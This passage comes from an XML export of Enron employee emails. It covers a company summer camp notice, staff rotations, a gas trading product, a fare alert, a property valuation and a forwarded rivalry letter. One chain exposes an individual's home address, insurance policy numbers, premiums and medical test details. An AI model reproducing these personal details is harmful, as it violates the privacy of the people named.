Stephanie Balette Casas/HOU/ECT@ECT, Cindy Cicchetti/HOU/ECT@ECT, Carol _x000D_
Coats/HOU/ECT@ECT, Ann Sanchez/Corp/Enron@ENRON, Teresa _x000D_
Smith/Corp/Enron@Enron, Sharon Stringfellow/HOU/ECT@ECT, Joann _x000D_
Collins/Corp/Enron@ENRON, Yolanda Cordova-Gilbert/HOU/ECT@ECT, Gay _x000D_
Mayeux/HOU/EES@EES, Sara Davidson/EPSC/HOU/ECT@ECT, Tammy L Drew/HOU/ECT@ECT, _x000D_
Christine Dinh/HOU/ECT@ECT, Marc Eichmann/Corp/Enron@ENRON, Jay _x000D_
Ferry/HOU/EES@EES, Brooklyn Couch/HOU/ECT@ECT, Antionette _x000D_
Forrest/HR/Corp/Enron@ENRON, Nicole Hunter/Enron Communications@Enron _x000D_
Communications, Mark Courtney/HOU/ECT@ECT, Ross Henning/Corp/Enron@Enron, _x000D_
George Hernandez/HOU/EES@EES, Donald W Herrick/HOU/ECT@ECT, Jeff _x000D_
Herrold/Corp/Enron@ENRON, Dalton Hogan/Corp/Enron@ENRON, Julia _x000D_
Kazibwe/HOU/EES@EES, Carol Jean Marshall/HOU/ECT@ECT, Gay Mayeux/HOU/EES@EES, _x000D_
Karen D McIlvoy/HOU/ECT@ECT, Kathy McMahon/Enron Communications@Enron _x000D_
Communications, Karen Myer/GPGFIN/Enron@ENRON, Audrey Pullen/HOU/ECT@ECT, _x000D_
Mary Perkins/HOU/ECT@ECT, Ray Stelly/ET&amp;S/Enron@ENRON, Edward E _x000D_
Quin/HOU/ECT@ECT, James Regan/OTS/Enron@ENRON, Beverly F Lakes/HOU/ECT@ECT, _x000D_
David Rinehart/Corp/Enron@ENRON, Steve Roberts/Corp/Enron@Enron, Deborah _x000D_
Rogers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mary Lynne Ruffer/HOU/ECT@ECT, _x000D_
Kathryn Schultea/HR/Corp/Enron@ENRON, Stephanie Sever/HOU/ECT@ECT, Margaret _x000D_
Bouldin/GPGFIN/Enron@ENRON, Donna Smith/EFS/EES@EES, Sarabeth _x000D_
Smith/ET&amp;S/Enron@ENRON, Carol St Clair/HOU/ECT@ECT, Luly _x000D_
Stephens/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cynthia _x000D_
Tang/HR/Corp/Enron@ENRON, Margo Terrell/HOU/ECT@ECT, John P _x000D_
Tollefsen/HOU/ECT@ECT, Jesse Wang/HR/Corp/Enron@ENRON, Stacy _x000D_
Weatherly/Corp/Enron@Enron, Pam White/Graphics/Enron@ENRON, Michael _x000D_
Wu/HR/Corp/Enron@ENRON, Jeanne Wukasch/Corp/Enron@ENRON, Maria _x000D_
Young/Corp/Enron@ENRON_x000D_
		 cc: Michelle Kapfer/HR/Corp/Enron@ENRON_x000D_
		 Subject: Camp Enron Information_x000D_
_x000D_
Dear Camp Enron Parents,_x000D_
 Whether your child is currently enrolled or will be in the upcoming weeks _x000D_
the information below will make camp go even smoother._x000D_
_x000D_
 1.  Immunization Records are needed for all campers.  _x000D_
       If you have not already submitted them, please fax these records to _x000D_
Michelle Kapfer at 713.646.2147.  _x000D_
 2.  Please put your child's name on all belongings that are being brought to _x000D_
camp._x000D_
 3.  Please drop your child off by 8:00 a.m. in the Energizer.  The busses _x000D_
will be loaded right after 8:00 a.m.._x000D_
 4.  Please be sure to pick up your child by 5:00 p.m. in the Energizer. _x000D_
(Remember the $1 per minute after 5pm policy)_x000D_
 5.  It is not recommended that your child bring any electronic items to _x000D_
camp. Kidventure and Enron are not responsible for these items._x000D_
 6.  It is not recommended that your child bring any money for souveniors _x000D_
when on the field trips.  _x000D_
 7.  All children MUST be signed in and out every day.  Please be sure that _x000D_
you check in/out with Brin._x000D_
_x000D_
If you have any questions, please give me a call at x37514._x000D_
_x000D_
Thanks,_x000D_
Michelle_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 09:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.shankman@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Phil Roan</t>
  </si>
  <si>
    <t>Phil Roan of Koch's Weather group has accepted a position with Reliant _x000D_
working for their Power Desk.  He starts in a week.  We tried to get him to _x000D_
reconsider, but he said that he was already committed.</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 07:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'massimo.marolo@enron.com'})</t>
  </si>
  <si>
    <t>Re: Rotation</t>
  </si>
  <si>
    <t xml:space="preserve">who runs that group for us?  Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Massimo Marolo@ENRON_x000D_
10/27/2000 01:38 PM_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Rotation  _x000D_
_x000D_
Jeff,_x000D_
_x000D_
I visited the Networks-sponsored Houston Technology Center and had a chance _x000D_
to interview with all the people working there. I believe that a rotation _x000D_
there could give me the opportunity to learn a great deal about the _x000D_
entrepreneurial/technology circles and at the same be a good tie-back to _x000D_
enron for my third stage. I would appreciate any suggestions or comments you _x000D_
might have. Again, thank you for your help._x000D_
_x000D_
Massimo  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 06:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fred Lagrasta Newsletter</t>
  </si>
  <si>
    <t>Mark,_x000D_
_x000D_
Hope you had a good trip back._x000D_
_x000D_
Please let me know if you need a hand finding the Fred Lagrasta newsletter on _x000D_
EnronOnline and/or if you are concerned by its contents._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 07:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'daniel.falcone@enron.com'})</t>
  </si>
  <si>
    <t>Re: 12/21 DPR</t>
  </si>
  <si>
    <t xml:space="preserve">OK_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daniel Falcone@ENRON_x000D_
12/22/2000 02:13 PM_x000D_
To: Janet R Dietrich/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, Shona _x000D_
Wilson/NA/Enron@Enron, l.kallas@pecorp.com, j.pokorny@pecorp.com, _x000D_
w.morrow@pecorp.com, Chris Abel/HOU/ECT@ECT, k.classen@pecorp.com, _x000D_
m.nordstrom@pecorp.com, Darron C Giron/HOU/ECT@ECT, Steve _x000D_
Jackson/HOU/ECT@ECT, t.allen@pecorp.com, t.patrick@pecorp.com, _x000D_
j.luebbers@pecorp.com, j.hengtgen@pecorp.com, Laura Luce/Corp/Enron@Enron, _x000D_
k.oconnell@pecorp.com, d.field@pecorp.com, j.pappalardo@pecorp.com, Vladimir _x000D_
Gorny/HOU/ECT@ECT, Frank Hayden/Corp/Enron@Enron, Gregg Penman/HOU/ECT@ECT, _x000D_
K.Naughton@pecorp.com, tim.hermann@enron.com, d.szumigalski@pecorp.com, Kevin _x000D_
P Radous/Corp/Enron@Enron, Bharat Khanna/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: 12/21 DPR_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 02:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>aggie/longhorn letter</t>
  </si>
  <si>
    <t xml:space="preserve">Something to get you ALL riled up!!  And you talk about LSU fans being bad- _x000D_
"Kill him"!!!_x000D_
---------------------- Forwarded by Shanna Husser/HOU/EES on 11/30/2000 10:35 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Christina Barthel_x000D_
11/30/2000 09:43 AM_x000D_
To: Shanna Husser/HOU/EES@EES, Kim Chick/HOU/EES@EES, Leon _x000D_
Branom/Corp/Enron@ENRON, Jason Sharp/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, _x000D_
James Hollman/Corp/Enron@ENRON, Robert B Cothran/Corp/Enron@ENRON, "Meredith" _x000D_
&lt;meredith@friersoncpa.com&gt;, "Zogheib, Lisa A" &lt;Lisa_Zogheib@AIMFUNDS.COM&gt;, _x000D_
"Kelly Kohrman" &lt;pyrowoman@hotmail.com&gt;, "Ashley" _x000D_
&lt;Ashley.Victorick@coastalcorp.com&gt;, "Jaimie" &lt;Jaimie.Parker@coastalcorp.com&gt;, _x000D_
"Erin" &lt;elaggie99@hotmail.com&gt;, "Anthony" &lt;urbanaj@texaco.com&gt;, "Jose" _x000D_
&lt;jose.a.suarez@us.pwcglobal.com&gt;, "Albert" &lt;albert.r.ferrel@exxon.com&gt;, _x000D_
"Oscar " &lt;oscgarcia@notes.primeco.com&gt;, "Misti" &lt;mkuehn@tcresidential.com&gt;_x000D_
cc:  _x000D_
Subject: aggie/longhorn letter_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Christina Barthel/HOU/EES on 11/30/2000 _x000D_
09:39 AM ---------------------------_x000D_
_x000D_
_x000D_
Amy.Jon@enron.com on 11/30/2000 09:37:29 AM_x000D_
To: Christina.Barthel@enron.com, kchick@enron.com, dflinn@enron.com, _x000D_
Lynna.Kacal@enron.com, "Leigh Ann Perry" &lt;aotleighann@hotmail.com&gt;, _x000D_
aramirez@enron.com, "Michelle" &lt;mtram@nccol.com&gt;, "Sponge" &lt;CZachgo@aol.com&gt;_x000D_
cc:  _x000D_
Subject: FW: Are we surprised to hear this?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 "Conduct of Texas Fans at Friday's Football Game Dismays Former Student"_x000D_
_x000D_
 November 28, 2000_x000D_
_x000D_
 Dear Battalion and Daily Texan:_x000D_
_x000D_
Please help me.  As a product of both Texas A&amp;M and the University of_x000D_
Texas - Austin, I thought I had learned a lot.  But I experienced some new_x000D_
things at the football game this past Friday that my education had not _x000D_
prepared_x000D_
me for.  No doubt there are Longhorn scholars who can set me straight.  I_x000D_
watched many joyful Texas fans along with a few Aggies tailgating and_x000D_
carousing.  Super.  Fall football rivalry.  Spirits were literally in_x000D_
abundance.  May the better football team win._x000D_
_x000D_
Then I saw things that I cannot really comprehend.  I saw a Longhorn fan_x000D_
with a t-shirt showing a fallen-over Bonfire.  The caption read, "What's_x000D_
wrong, Aggies? Can't keep it up?"  Can someone explain that to me?  I do_x000D_
not get it.  I assure you, I get the sexual nuance - I just do not understand_x000D_
evil._x000D_
_x000D_
I saw Longhorn fans mocking and taunting the fans from A&amp;M who were in_x000D_
Corps of Cadets uniforms.  "Little Hitlers," they were called.  They were _x000D_
being_x000D_
spat at.  Help me to understand this Longhorn slant on rivalry.  I_x000D_
thought we were all against Hitler - Longhorns and Aggies._x000D_
_x000D_
I saw a Longhorn cheerleader - isn't he supposed to represent UT in the_x000D_
finest possible way?  - run in front of the Aggie Band, turn and face it_x000D_
square on and salute with the clicked heels, arm-above-head, "Heil_x000D_
Hitler" sign. _x000D_
_x000D_
What don't I know here?  What didn't I learn in history class?  All these_x000D_
things happened before kickoff._x000D_
_x000D_
Aggies, I respect your presentation of a $50,000 endowed scholarship as a_x000D_
thank-you for UT's respect and support shown last year.  That support_x000D_
obviously came from the finer Horns.  I admired the fortitude and_x000D_
restraint exercised by the Corps of Cadets under attack._x000D_
_x000D_
Unfortunately, I learned that hundreds and hundreds of Longhorns have_x000D_
More than one way to show the Hook 'em Horns sign.  They prefer to use their_x000D_
middle finger.  Class.  Really intelligent and creative.  That will_x000D_
quickly teach those "littlest" Longhorns how to show spirit.  I just pray they_x000D_
get an honest chance to choose._x000D_
_x000D_
I am learning.  I have attended both schools.  I will choose the higher_x000D_
ground._x000D_
_x000D_
Susan Priest_x000D_
Classes of '77 and '81_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 03:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: SoCal Released Capacity</t>
  </si>
  <si>
    <t>i HEA RYOU LOUD AND CLEAR.</t>
  </si>
  <si>
    <t>Fri, 5 Nov 1999 02:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Revised Cata</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the updated copy with ENA in the upper right hand corner. Please _x000D_
approve, and _x000D_
then I will forward it to Sean Black immediately._x000D_
_x000D_
Regards,_x000D_
David_x000D_
_x000D_
_x000D_
---------------------- Forwarded by David P Dupre/HOU/ECT on 11/05/99 10:42 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Dale Neuner on 11/02/99 01:15:58 PM_x000D_
To: Sean Black/HOU/ECT@ECT, David P Dupre/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Catalytica  _x000D_
_x000D_
Absolutely. Great catch._x000D_
_x000D_
David, please make the appropriate changes._x000D_
_x000D_
Dale_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sean Black   11/02/99 01:13 PM_x000D_
_x000D_
To: Dale Neuner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Catalytica  _x000D_
_x000D_
Dale,_x000D_
_x000D_
I know you are turning over your prior duties but I had one question about _x000D_
the Confirmation you sent down last week; the Enron Company Name in the upper _x000D_
right hand corner was Enron Capital Trade &amp; Resources._x000D_
_x000D_
Should this not be Enron North America?_x000D_
_x000D_
Please advise_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Sep 2000 01:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jcutaia@tupac.com', 'suhernan@llgm.com'})</t>
  </si>
  <si>
    <t>[Fwd: FW: Prayer]</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 09/08/2000 _x000D_
08:05 AM ---------------------------_x000D_
_x000D_
_x000D_
Regina Blackshear@ENRON_x000D_
09/07/2000 07:02 PM_x000D_
To: Amber Limas/HOU/ECT@ECT, Diane Salcido/Corp/Enron@Enron, Angela _x000D_
Barnett/HOU/ECT@ECT, Tracy Harrison/NA/Enron@Enron, Eve _x000D_
Puckett/Corp/Enron@ENRON, Leslie Smith/HOU/ECT@ECT, Judy _x000D_
Hernandez/HOU/ECT@ECT, Tharsilla Broussard/HR/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: [Fwd: FW: Prayer]_x000D_
_x000D_
love and blessings_x000D_
gina_x000D_
_x000D_
_x000D_
God bless and  have a nice day!_x000D_
_x000D_
"Father, I ask you to bless my friends, relatives_x000D_
and email buddies reading this right now._x000D_
Show them a new revelation of your love_x000D_
and power.  Holy Spirit, I ask you to minister_x000D_
to their spirit at this very moment._x000D_
Where there is pain, give them your peace and mercy._x000D_
Where there is self-doubt, release a renewed_x000D_
confidence through your grace, In Jesus precious Name."_x000D_
Amen_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 04:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Paragraph 13 of the CSAs</t>
  </si>
  <si>
    <t>----- Forwarded by Mark Taylor/HOU/ECT on 08/25/2000 11:48 AM -----_x000D_
_x000D_
	RRichards@milbank.com_x000D_
	08/25/2000 10:41 AM_x000D_
		 _x000D_
		 To: craig.clark@enron.com, ryan.siurek@enron.com, clint.walden@enron.com, _x000D_
kevin.d.jordan@enron.com, mark.taylor@enron.com, _x000D_
brent.vasconcellos@enron.com, annmarie.tiller@enron.com_x000D_
		 cc: _x000D_
		 Subject: FW: Paragraph 13 of the CSAs_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message----- _x000D_
From:?? Richards, Raymond _x000D_
Sent:?? Friday, August 25, 2000 10:33 AM _x000D_
To:???? 'mary.cook@enron.com' _x000D_
Subject:??????? Paragraph 13 of the CSAs _x000D_
Importance:???? High _x000D_
_x000D_
Attached below please find the CSA's.? _x000D_
_x000D_
 &lt;&lt;REDLINE.DOC&gt;&gt;  &lt;&lt;Citi-Enron CSA.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 REDLINE.DOC_x000D_
 - Citi-Enron CSA.doc</t>
  </si>
  <si>
    <t>Mon, 17 Dec 2001 11:16:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gthorse@keyad.com'})</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
_x000D_
Greg,_x000D_
_x000D_
I plugged the data on Colonial Oaks into your format.  The actual NOI for 2001 is around 305,000.  But there is not a professional management company.  Subtracting $25,000 for management costs the NOI would be $280,000.  However, I increased the taxes and a few other expenses to bring total expenses up to $3,000/unit.  This would yield an NOI of $240,000.  Comparing the rents charged to the other 17 properties, it doesn't look like the rents have a great deal of upside.  _x000D_
_x000D_
The asking price is $2,700,000.  Using $240,000 would make this an 8.9 cap.  Using the seller's NOI of $280,000 would be a 10.4 cap.  The cost per unit is $33,750 for a 1969 project.  The cost per square foot is 36.58.  _x000D_
_x000D_
The numbers would be better if the property was offered at $2.5 million.  Jeff Smith claims that $2.7 million is as low as the seller will go.  This property has not been on the market.  So I would like your input of what the market would pay for it.  If $280,000 is a reasonable NOI, then I would thing it would be sold fairly quickly for $2.7 million.  It does have the benefit of all brick exterior and elderly tenants.  Plus the location is by far the most convenient._x000D_
_x000D_
Financing is the other consideration.  I am assuming 25 year, 7%,  and 25% down.  What do you think could actually be achieved?  Can you put me in contact with a lender?_x000D_
_x000D_
I will follow up with a phone call._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Phillip</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 06:28:53 -0800 (PST)</t>
  </si>
  <si>
    <t>Monday, October 29, 2001_x000D_
_x000D_
Dear Mathew,_x000D_
_x000D_
Travelocity Fare Watcher, your personal airfare tracking_x000D_
service, has found fare changes in 1 of your markets._x000D_
_x000D_
Note: Fares change quickly and sell out fast. Visit Travelocity_x000D_
now to take advantage of this great opportunity!  Click on this_x000D_
link or paste the URL into your browser:_x000D_
http://dps1.travelocity.com:80/fwemindiv.ctl?fw=05J9G74&amp;Service=TRAVELOCITY&amp;LANG=EN_x000D_
_x000D_
HAVE YOUR TRAVEL NEEDS CHANGED?_x000D_
_x000D_
Looking to go someplace new? Be sure to update your Fare Watcher_x000D_
subscription to include your favorite destinations._x000D_
_x000D_
FARES_x000D_
_x000D_
_x000D_
*  IAH-FLL   FROM: Houston-Bush Intercontinental (IAH)_x000D_
             TO:   Ft Lauderdale/Hollywood Intl (FLL)_x000D_
   PRICE:    NEW PRICE        WAS        DIFFERENCE_x000D_
             ---------      -------      ----------_x000D_
             $112.00        $178.00      -$66.00_x000D_
_x000D_
_x000D_
_x000D_
GREAT HOTEL DEALS!_x000D_
_x000D_
Travelocity.com offers Value Rates at great hotels in:_x000D_
Ft Lauderdale/Hollywood Intl (FLL) starting at just $59_x000D_
Click: http://dps1.travelocity.com:80/hotsrqst.ctl?mode=2&amp;airport=FLL&amp;rate_cat=V_x000D_
_x000D_
_x000D_
Thank you for choosing Travelocity as your one-stop travel_x000D_
resource!_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
The Travelocity Team_x000D_
Travelocity.com - Go Virtually Anywhere_x000D_
http://www.travelocity.com/_x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
VACATION DEALS!_x000D_
_x000D_
Hot deals to the Caribbean, Las Vegas, and more!_x000D_
http://leisure.travelocity.com/RealDeals/0,2942,TRAVELOCITY_VAC,00.html_x000D_
_x000D_
CRUISE DEALS!_x000D_
_x000D_
Don't miss a look at our incredible Cruise Deals! Updated daily,_x000D_
find the voyage that suits your budget!_x000D_
http://leisure.travelocity.com/RealDeals/0,2942,TRAVELOCITY_CRU,00.html_x000D_
_x000D_
SAVE $75 IN AIRFARE_x000D_
_x000D_
Get $75 in Rebates on your next Airfare Purchases!_x000D_
Join the Travelocity Preferred Traveler Program and you'll_x000D_
receive up to $75 in rebates on your next three flights, hotel_x000D_
savings and room upgrades, up to 20% off at restaurants_x000D_
nationwide, and more. Enroll today!_x000D_
http://leisure.travelocity.com/preferredtraveler/?source=PM_x000D_
_x000D_
EARN FREE TRAVEL. NO RESTRICTIONS!_x000D_
_x000D_
The NEW Travelocity World MasterCard_x000D_
Earn points towards free travel with new Travelocity MasterCard!_x000D_
You'll earn 1 point for every dollar spent. Earn 8,000 points_x000D_
and you'll receive $100 off your next Travelocity.com booking._x000D_
We'll spot you 4,000 points to get started, so you are already_x000D_
half way there! Visit http://www.travelocitycard.com to apply._x000D_
_x000D_
IMPORTANT FARE INFORMATION:_x000D_
_x000D_
All fares are quoted in US Dollars.  Fares shown are for one_x000D_
adult round-trip between your selected cities and are subject_x000D_
to additional charges, including, but not limited to, Passenger_x000D_
Facility Charges (ranging from $2-$18), Federal Segment Fees of_x000D_
$2.75 per segment (defined as a takeoff and a landing), and_x000D_
taxes/fees associated with international itineraries of up to_x000D_
USD $113 or local currency equivalent. Fuel surcharges, if applicable_x000D_
are included in the fees listed._x000D_
_x000D_
Total fare per passenger, including all charges, will always_x000D_
be displayed to you prior to final ticket purchase. Please note_x000D_
that fares are subject to restrictions, may not be available on_x000D_
all flights, and may change without notice. For detailed descriptions_x000D_
of the fare rules, click on the corresponding rules link._x000D_
_x000D_
CHANGE OR CANCEL YOUR SUBSCRIPTION TO FAREWATCHER EMAIL_x000D_
http://dps1.travelocity.com:80/fwemsub.ctl?Service=TRAVELOCITY&amp;LANG=EN_x000D_
_x000D_
UPDATE YOUR EMAIL ADDRESS_x000D_
http://dps1.travelocity.com:80/fwemsub.ctl?Service=TRAVELOCITY&amp;LANG=EN_x000D_
_x000D_
RETRIEVE YOUR PASSWORD_x000D_
http://dps1.travelocity.com:80/lognpwdform.ctl?Service=TRAVELOCITY&amp;LANG=EN</t>
  </si>
  <si>
    <t>Re: New Product</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the help._x000D_
_x000D_
I have put several products out for your approval.  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Robert B Cass_x000D_
11/27/2000 04:22 PM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc: Melba Lozano/HOU/ECT@ECT _x000D_
Subject: Re: New Product_x000D_
_x000D_
Hi Eric -_x000D_
_x000D_
I have just been advised that the  new Index  that you requested (as detailed _x000D_
below) is now available for you to create as a product.  _x000D_
_x000D_
Thanks for letting us work with you._x000D_
_x000D_
- Rob _x000D_
x35491_x000D_
---------------------- Forwarded by Robert B Cass/HOU/ECT on 11/27/2000 03:00 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Robert B Cass_x000D_
11/22/2000 09:41 AM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc: Melba Lozano/HOU/ECT@ECT, Dawn C Kenne/HOU/ECT@ECT _x000D_
Subject: Re: New Product  _x000D_
_x000D_
Hi Eric -_x000D_
_x000D_
We will begin testing your index today.   The description for your index will _x000D_
read as follows:_x000D_
_x000D_
"The Index for a day shall be the Daily Midpoint price published on such _x000D_
calendar day under the heading  "Daily Price Survey" in the _x000D_
East-Houston-Katy, Katy plant tailgate section of Gas Daily, or if a calendar _x000D_
day is not a Business Day then the price used shall be the Daily Midpoint _x000D_
price published on the next suceeding Business Day. " _x000D_
_x000D_
The Product Short Description on the website will be as follows:_x000D_
_x000D_
 US Gas Daily  KatyPltTailgate  Month/Year  USD/MM_x000D_
_x000D_
_x000D_
Please advise if this does not meet with your approval._x000D_
_x000D_
Thanks - _x000D_
Rob  _x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Bass                           11/21/2000 12:48 PM_x000D_
	_x000D_
_x000D_
To: Robert B Cass/HOU/ECT@ECT_x000D_
cc: Dale Neuner/HOU/ECT@ECT _x000D_
Subject: New Product_x000D_
_x000D_
Rob,_x000D_
_x000D_
I need to get a new gas daily product created.  This product will be settled _x000D_
daily against the Katy Plant Tailgate under the East-Houston-Katy subheading _x000D_
in Gas Daily._x000D_
_x000D_
_x000D_
Call with questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
x3-0977_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 08:51:58 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan@gersten.com'})</t>
  </si>
  <si>
    <t>Re: Life Ins. App</t>
  </si>
  <si>
    <t>We should have the policies next week and then forwarded on to you.Have good Thanks giving._x000D_
  ----- Original Message ----- _x000D_
  From: Shapiro, Richard _x000D_
  To: Jonathan Goldstein _x000D_
  Sent: Tuesday, November 20, 2001 11:39 AM_x000D_
  Subject: RE: Life Ins. App_x000D_
_x000D_
_x000D_
  Will get in mail tonight. Thanks._x000D_
    -----Original Message-----_x000D_
    From: Jonathan Goldstein [mailto:jonathan@gersten.com]_x000D_
    Sent: Tuesday, November 20, 2001 10:37 AM_x000D_
    To: Shapiro, Richard_x000D_
    Subject: Fw: Life Ins. App_x000D_
_x000D_
_x000D_
    Hi Rich,_x000D_
    They did approve the 2mm.To activate the coverage:_x000D_
_x000D_
        Michele Lecoca--$1610 - 10% off 1st yr-$1449_x000D_
                                             (z01209440)_x000D_
       Richard Shapiro--$1890- 10%off   1st yr-1701_x000D_
                                                (Z01209831)_x000D_
                  payable to:West Coast Life_x000D_
                               send to_x000D_
                      Jonathan GOldstein_x000D_
                  189 Reservoir st_x000D_
                      Needham,Ma 02494_x000D_
      _x000D_
    ----- Original Message ----- _x000D_
    From: Jonathan Goldstein _x000D_
    To: Shapiro, Richard _x000D_
    Sent: Thursday, November 15, 2001 1:02 PM_x000D_
    Subject: Re: Life Ins. App_x000D_
_x000D_
_x000D_
    Hi Rich,_x000D_
    Both you and Michelle were approved super preferred by_x000D_
    West Coast Life:_x000D_
                                  Richard   $1.5mm-20yr is $1430 _x000D_
                                                   $2mm---20yr is $1890_x000D_
                                                  $1.5mm- 30yr is$ 2980_x000D_
                                                  $2mm----30yr is$3950_x000D_
                                 Michelle  $1.5mm-20yr is $1220_x000D_
                                                  $2mm---20yr is $1620_x000D_
                                If paid annual the 1st yr there is_x000D_
                           a 10% disc ount for 1st yr only.So you_x000D_
                          could pay annual this year than pay qy or _x000D_
    semi next year.                   _x000D_
     _x000D_
      ----- Original Message ----- _x000D_
      From: Shapiro, Richard _x000D_
      To: Jonathan Goldstein ; rshapiro@enron.com _x000D_
      Sent: Wednesday, November 07, 2001 4:53 PM_x000D_
      Subject: RE: Life Ins. App_x000D_
_x000D_
_x000D_
      281-955-3600 for their FM 1960 location (brain MRI) and 281-446-2930 for their Humble location(stomach x-rays). All tests were negative, just a hypochondriac._x000D_
        -----Original Message-----_x000D_
        From: Jonathan Goldstein [mailto:jonathan@gersten.com]_x000D_
        Sent: Wednesday, November 07, 2001 3:08 PM_x000D_
        To: rshapiro@enron.com_x000D_
        Subject: Life Ins. App_x000D_
_x000D_
_x000D_
        Do you know where River Oaks or do you have there ph#?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Mon, 8 Jan 2001 05:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bob.burleson@enron.com'})</t>
  </si>
  <si>
    <t>Re: POGO I/C - Lea Co.</t>
  </si>
  <si>
    <t>Thanks for the update.  _x000D_
_x000D_
I agree we should go ahead and prepare for the inevitable "I want to flow _x000D_
tomorrow" scenario.  Let's use the $35,000 to proceed with our internal _x000D_
administrative needs, including "land owner notification" and then we will be _x000D_
ready for them when they begin construction._x000D_
_x000D_
Let me know if there is anything I can do._x000D_
_x000D_
Bob</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 06:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Vikas Dwivedi</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 08/21/2000 _x000D_
01:08 PM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
08/21/2000 12:58 PM_x000D_
To: Shelly Butler/HOU/ECT@ECT_x000D_
cc: John J Lavorato/Corp/Enron@Enron, Jeffrey A Shankman/HOU/ECT@ECT, Hunter _x000D_
S Shively/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Re: Vikas Dwivedi  _x000D_
_x000D_
Shelly,_x000D_
_x000D_
I shall not accept anybody for a rotation without a prior interview._x000D_
_x000D_
Li was scheduled to meet with me last Thursday but  she never showed _x000D_
up. She did not call to cancel or to apologize for not showing up._x000D_
I have not seen her resume. _x000D_
_x000D_
Please, assume she is not rotating into my group till further notice._x000D_
_x000D_
Vince_x000D_
 _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Shelly Butler                           08/18/2000 03:37 PM_x000D_
	_x000D_
_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc: Hunter S Shively/HOU/ECT@ECT, John J Lavorato/Corp/Enron@Enron, Vince J _x000D_
Kaminski/HOU/ECT@ECT, Craig Breslau/HOU/ECT@ECT, Ina Rangel/HOU/ECT@ECT _x000D_
Subject: Vikas Dwivedi  _x000D_
_x000D_
Jeff,_x000D_
_x000D_
Just wanted to confirm that Li will be placed in Vince Kaminski's group.  _x000D_
Vikas has been placed in ENA Middle Market reporting to Craig Breslau.  _x000D_
Please contact me at 3-4584 if you have any questions.  Thanks for your help!!_x000D_
_x000D_
Shelly_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jeffrey A Shankman                           08/18/2000 03:18 PM_x000D_
	_x000D_
_x000D_
To: Shelly Butler/HOU/ECT@ECT_x000D_
